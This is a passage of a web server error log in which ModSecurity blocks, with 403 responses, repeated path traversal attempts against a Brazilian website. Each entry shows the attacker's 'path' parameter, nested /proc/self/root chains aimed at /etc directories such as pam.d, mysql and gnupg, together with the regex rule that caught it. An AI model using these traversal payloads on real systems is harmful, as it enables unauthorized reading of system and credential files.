"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueXAbLMZ6AikZjR9UkiAAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:33.366103 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:58236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueXV_V7PWP6ixUYl6DJgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:33.678974 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.241.31:38438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueXf-YZRR_7pZ7nDJUgAAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:35.017352 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:38450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueX-oXxyEfFpUF8f_YoQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:36.305026 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:38460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueYAbLMZ6AikZjR9UkiQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:37.605948 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:52122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueYfu8EFLIOrSqIptk5gAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:38.909184 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:52128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueYgkwaGbbGflqUZB7pAAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:40.012683 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:58250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZAkwaGbbGflqUZB7pgAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:40.199285 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:52134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZAkwaGbbGflqUZB7pwAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:41.313724 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:54524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZcdf6f5d65gmYZQ6eQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:41.503672 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:52144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZQkwaGbbGflqUZB7rAAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:42.626536 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:54534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZv-YZRR_7pZ7nDJUgwAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:57:42.856587 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:52158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZvu8EFLIOrSqIptk6AAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:43.971426 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:54546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueZwkwaGbbGflqUZB7sQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:44.175491 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:52164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueaAbLMZ6AikZjR9UkiwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:45.500976 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:52170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueaf-YZRR_7pZ7nDJUiwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:47.716535 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.241.31:52184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueal_V7PWP6ixUYl6DLgAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:47.740636 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:54562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueav-YZRR_7pZ7nDJUjgAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:50.289372 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:54576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuebcdf6f5d65gmYZQ6fgAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:57:50.295776 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:35776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuebQbLMZ6AikZjR9UkjwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:51.698959 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:46052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueb-oXxyEfFpUF8f_YqwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:57:51.746490 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:35780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuebwbLMZ6AikZjR9UkkwAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
